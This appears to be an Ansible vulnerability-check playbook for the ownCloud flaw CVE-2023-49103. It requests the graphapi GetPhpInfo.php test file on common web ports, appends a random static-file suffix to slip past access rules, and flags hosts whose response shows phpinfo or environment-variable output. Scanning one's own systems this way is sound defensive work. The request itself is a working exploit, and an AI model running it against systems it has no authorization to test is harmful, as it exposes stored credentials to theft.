- name: CVE-2023-49103 ownCloud Disclosure of Sensitive Credentials and Configuration in Containerized Deployments Playbook
  gather_facts: false
  hosts: all
  vars:
    uris:
      - "apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
    pattern1: '>\$_ENV\['
    pattern2: 'phpinfo\(\)'
    ports:
      - 80
      - 443
      - 8080
    paths:
      - ".css"
      - ".js"
      - ".svg"
      - ".gif"
      - ".png"
      - ".html"
      - ".ttf"
      - ".woff"
      - ".ico"
      - ".jpg"
      - ".jpeg"
      - ".json"
      - ".properties"
      - ".min.map"
      - ".js.map"
      - ".auto.map"
  tasks:
    - name: Select path to append
      ansible.builtin.set_fact:
        path_append: "{{ item }}"
      with_random_choice: "{{ paths }}"

    - name: Assess vulnerable condition
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}/{{ item.1 }}/{{ path_append }}"
        method: GET
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
      loop: "{{ ports | product(uris) }}"
      register: response
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Assert vulnerable condition response
      ansible.builtin.assert:
        that:
          - item.content | regex_search(pattern1) or item.content | regex_search(pattern2)
        fail_msg: "Host {{ inventory_hostname }} is not vulnerable"
        success_msg: "Host {{ inventory_hostname }} is potentially vulnerable"
      loop: "{{ response.results }}"
      when:
        - response is defined
        - item.status == 200
